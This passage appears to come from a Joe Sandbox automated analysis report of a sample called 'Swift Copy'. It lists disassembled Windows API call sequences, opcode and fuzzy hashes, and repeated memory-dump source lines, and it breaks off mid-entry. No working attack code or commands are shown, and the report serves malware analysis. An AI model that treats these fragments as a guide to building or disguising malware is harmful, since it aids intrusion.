                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ObjectSelect$BeginCreatePath
                                              • String ID:
                                              • API String ID: 3225163088-0
                                              • Opcode ID: 96a3aa06df7ab3e50637350e2bb6ea44deec94463a10ee875255caec79da22ee
                                              • Instruction ID: c68bfd2233d75da9c05a3c3c7e2bc7b92cccd34c48163cca999b46f9b47729c8
                                              • Opcode Fuzzy Hash: 96a3aa06df7ab3e50637350e2bb6ea44deec94463a10ee875255caec79da22ee
                                              • Instruction Fuzzy Hash: 5B217134802305EFDF11AF66DC257B97B74BB91365F280256F560B61A0E37198DACFA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: b3dd3ddf4004d5d229b6f8fe4b9a4f6ffcdd4e2a910e3a66ef6685671dfc31cb
                                              • Instruction ID: 63e93584a7a0f0d4e23de71208c070de31638c5e68db19b8dddeb93ae26a7588
                                              • Opcode Fuzzy Hash: b3dd3ddf4004d5d229b6f8fe4b9a4f6ffcdd4e2a910e3a66ef6685671dfc31cb
                                              • Instruction Fuzzy Hash: C501926564170AFAE6185510AD82FBA735CDB21394B244022FD14AA785F661ED6086B4
                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,00D9F2DE,00DA3863,00E41444,?,00D8FDF5,?,?,00D7A976,00000010,00E41440,00D713FC,?,00D713C6), ref: 00DA2DFD
                                              • _free.LIBCMT ref: 00DA2E32
                                              • _free.LIBCMT ref: 00DA2E59
                                              • SetLastError.KERNEL32(00000000,00D71129), ref: 00DA2E66
                                              • SetLastError.KERNEL32(00000000,00D71129), ref: 00DA2E6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: 564f89531f80c5e979cd7ec1be7cbc40cbe7f61fe21ce710ba50d82e81732851
                                              • Instruction ID: 08656b00cde4fcf5778cd19b554f325b5773cc2f27b8fa44b74ffb6942edd344
                                              • Opcode Fuzzy Hash: 564f89531f80c5e979cd7ec1be7cbc40cbe7f61fe21ce710ba50d82e81732851
                                              • Instruction Fuzzy Hash: 2501F4322456006FC612273F6C4AE3B266AEBD37B1B384128F465F21D2EB79CE854130
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?,?,00DD035E), ref: 00DD002B
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?), ref: 00DD0046
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?), ref: 00DD0054
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?), ref: 00DD0064
                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DCFF41,80070057,?,?), ref: 00DD0070
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: c36aa03c84fcaf80cff0376827fddea116ba06a744ad10f193de8647febe5c0b
                                              • Instruction ID: 6a9fbf52b323aab9dd0a9e265b540d11b9667e3ae8972580642290f4e501a7db
                                              • Opcode Fuzzy Hash: c36aa03c84fcaf80cff0376827fddea116ba06a744ad10f193de8647febe5c0b
                                              • Instruction Fuzzy Hash: D0018F72600204BFDB104F69DC04BBA7EADEB84752F248225F905E2210D776DD848BB0
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE997
                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 00DDE9A5
                                              • Sleep.KERNEL32(00000000), ref: 00DDE9AD
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00DDE9B7
                                              • Sleep.KERNEL32 ref: 00DDE9F3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: f0368be5a0c004b647255198b6fed3fdfdd01f1df158cc8b67aecace76053261
                                              • Instruction ID: e818860c27568ca3e77933f41a5894dac21197659c684f5365695352382773c8
                                              • Opcode Fuzzy Hash: f0368be5a0c004b647255198b6fed3fdfdd01f1df158cc8b67aecace76053261
                                              • Instruction Fuzzy Hash: 1E011731C02629DBCF00ABE6DC69AEDFB78FB09701F100656E542B6251CB3196998BA1
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00DD1114
                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1120
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD112F
                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00DD0B9B,?,?,?), ref: 00DD1136
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00DD114D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 842720411-0
                                              • Opcode ID: 06dd1ba27d71278d4e0eb0208cca3669be1ed8364a670a0b4e875fd1dbecc544
                                              • Instruction ID: bd7e8736d01f0289490ff559aebd2637ac336495900fa1fbfb32da7eb025cf9f
                                              • Opcode Fuzzy Hash: 06dd1ba27d71278d4e0eb0208cca3669be1ed8364a670a0b4e875fd1dbecc544
                                              • Instruction Fuzzy Hash: 67011D79101305BFDB114FA5DC49A6A3B7EEF89360B244515FA45D7350DA32DC849A60
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0FCA
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0FD6
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0FE5
                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DD0FEC
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD1002
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 3e4f75c55c167d1683df3fba7780db6f05a3e80f6c70afe93d5e0e17425c2022
                                              • Instruction ID: e922cde4de68dbc8bf8a24e81ded39a0bb27a035172c4105631f3d9d8a066467
                                              • Opcode Fuzzy Hash: 3e4f75c55c167d1683df3fba7780db6f05a3e80f6c70afe93d5e0e17425c2022
                                              • Instruction Fuzzy Hash: C5F0AF39140302BFD7211FA59C49F563B6DEF89761F200515F905D6250CA31DC808A60
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DD102A
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1036
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1045
                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD104C
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DD1062
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 9c2c968f44edc3867b8fc8bfb93bf017d8c4c1050c31bad15f401bfec9802f0c
                                              • Instruction ID: ebe7f89718480dc4c49d08be37b22f95b1e4bc252893911bfff108822e2549cf
                                              • Opcode Fuzzy Hash: 9c2c968f44edc3867b8fc8bfb93bf017d8c4c1050c31bad15f401bfec9802f0c
                                              • Instruction Fuzzy Hash: 94F04939201301BFDB216FA6EC49F663BADEF89761F240515FA45E6250CA72D8848A60
                                              APIs
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0324
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0331
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE033E
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE034B
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0358
                                              • CloseHandle.KERNEL32(?,?,?,?,00DE017D,?,00DE32FC,?,00000001,00DB2592,?), ref: 00DE0365
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              • Opcode ID: 90b9cb27bc75663db864975de0ece11965fa95581c1cf660c974719580dfbe12
                                              • Instruction ID: 3cc1f321891342710747b17d3bfe05fd79b9261b2d514b41ea805aa19a9661f0
                                              • Opcode Fuzzy Hash: 90b9cb27bc75663db864975de0ece11965fa95581c1cf660c974719580dfbe12
                                              • Instruction Fuzzy Hash: 1401AE72800B559FCB30AF66D880812FBF9BF603153198A3FD19652931C3B1A998CF90
                                              APIs
                                              • _free.LIBCMT ref: 00DAD752
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DAD764
                                              • _free.LIBCMT ref: 00DAD776
                                              • _free.LIBCMT ref: 00DAD788
                                              • _free.LIBCMT ref: 00DAD79A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: ea22048de59b337d403776d97211f6caeb9be652736a7e4f677a0e4876c39ff5
                                              • Instruction ID: 0a04668304671d31a5373e0a2641b1fa61487ff161d88acd0f585fe8193b45cf
                                              • Opcode Fuzzy Hash: ea22048de59b337d403776d97211f6caeb9be652736a7e4f677a0e4876c39ff5
                                              • Instruction Fuzzy Hash: ADF0EC32544208AF8669EB6AF9C5C2A7BDEFB46710BA90C05F04AF7911C730FC808A75
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 00DD5C58
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00DD5C6F
                                              • MessageBeep.USER32(00000000), ref: 00DD5C87
                                              • KillTimer.USER32(?,0000040A), ref: 00DD5CA3
                                              • EndDialog.USER32(?,00000001), ref: 00DD5CBD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: 0b8dbd29b631b73cfe4efadd42635236f4efd4994b450a5dbe7e3950f93614b4
                                              • Instruction ID: b2442c1b39132eb7c1367db28e9852872b3270ee5e6d90b0137b8e7b595a4eb1
                                              • Opcode Fuzzy Hash: 0b8dbd29b631b73cfe4efadd42635236f4efd4994b450a5dbe7e3950f93614b4
                                              • Instruction Fuzzy Hash: FB018B30510B049FEB305B15FD4EFA577B8BB00B45F04065AA587711E1DBF299C88A60
                                              APIs
                                              • _free.LIBCMT ref: 00DA22BE
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DA22D0
                                              • _free.LIBCMT ref: 00DA22E3
                                              • _free.LIBCMT ref: 00DA22F4
                                              • _free.LIBCMT ref: 00DA2305
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 9fb320d47fbf53f996a6a73141b71ad34c3371672e39899faa0d06c96b8a0d2b
                                              • Instruction ID: 17739bd22a9559f1c85b443500a9095299685246d0716c3ac9106150f59df967
                                              • Opcode Fuzzy Hash: 9fb320d47fbf53f996a6a73141b71ad34c3371672e39899faa0d06c96b8a0d2b
                                              • Instruction Fuzzy Hash: 94F054785402108F8B56AF6BBC018293F64F71BB517160566F510F2371C730555ABFF9
                                              APIs
                                              • EndPath.GDI32(?), ref: 00D895D4
                                              • StrokeAndFillPath.GDI32(?,?,00DC71F7,00000000,?,?,?), ref: 00D895F0
                                              • SelectObject.GDI32(?,00000000), ref: 00D89603
                                              • DeleteObject.GDI32 ref: 00D89616
                                              • StrokePath.GDI32(?), ref: 00D89631
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 67adaed6a51b1e9b7b4847c8b4e147898972c9df78e54c0516d530d72e492fc9
                                              • Instruction ID: d6d7ef7ccca58f52746e71e2a556c9aad06b0f5f972858d2f212352393bdfca7
                                              • Opcode Fuzzy Hash: 67adaed6a51b1e9b7b4847c8b4e147898972c9df78e54c0516d530d72e492fc9
                                              • Instruction Fuzzy Hash: E3F01938006204EFDB126F66ED287643B65EB82362F188354F6A9750F0D73189DADF20
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: __freea$_free
                                              • String ID: a/p$am/pm
                                              • API String ID: 3432400110-3206640213
                                              • Opcode ID: 989fbaa6c5e9f246f6df9bd1c9b6ee51c06716fea1c07ce309cbef61be6bc6a4
                                              • Instruction ID: a6edaffbf13c25c64c3194ec21f748fd181de4fb9ac13055e74ce12a3b068b1e
                                              • Opcode Fuzzy Hash: 989fbaa6c5e9f246f6df9bd1c9b6ee51c06716fea1c07ce309cbef61be6bc6a4
                                              • Instruction Fuzzy Hash: E6D1F039900206DADF289F68C856BFABBB5EF07310F2C4259E941AB650D375DD80CBB5
                                              APIs
                                                • Part of subcall function 00D90242: EnterCriticalSection.KERNEL32(00E4070C,00E41884,?,?,00D8198B,00E42518,?,?,?,00D712F9,00000000), ref: 00D9024D
                                                • Part of subcall function 00D90242: LeaveCriticalSection.KERNEL32(00E4070C,?,00D8198B,00E42518,?,?,?,00D712F9,00000000), ref: 00D9028A
                                                • Part of subcall function 00D900A3: __onexit.LIBCMT ref: 00D900A9
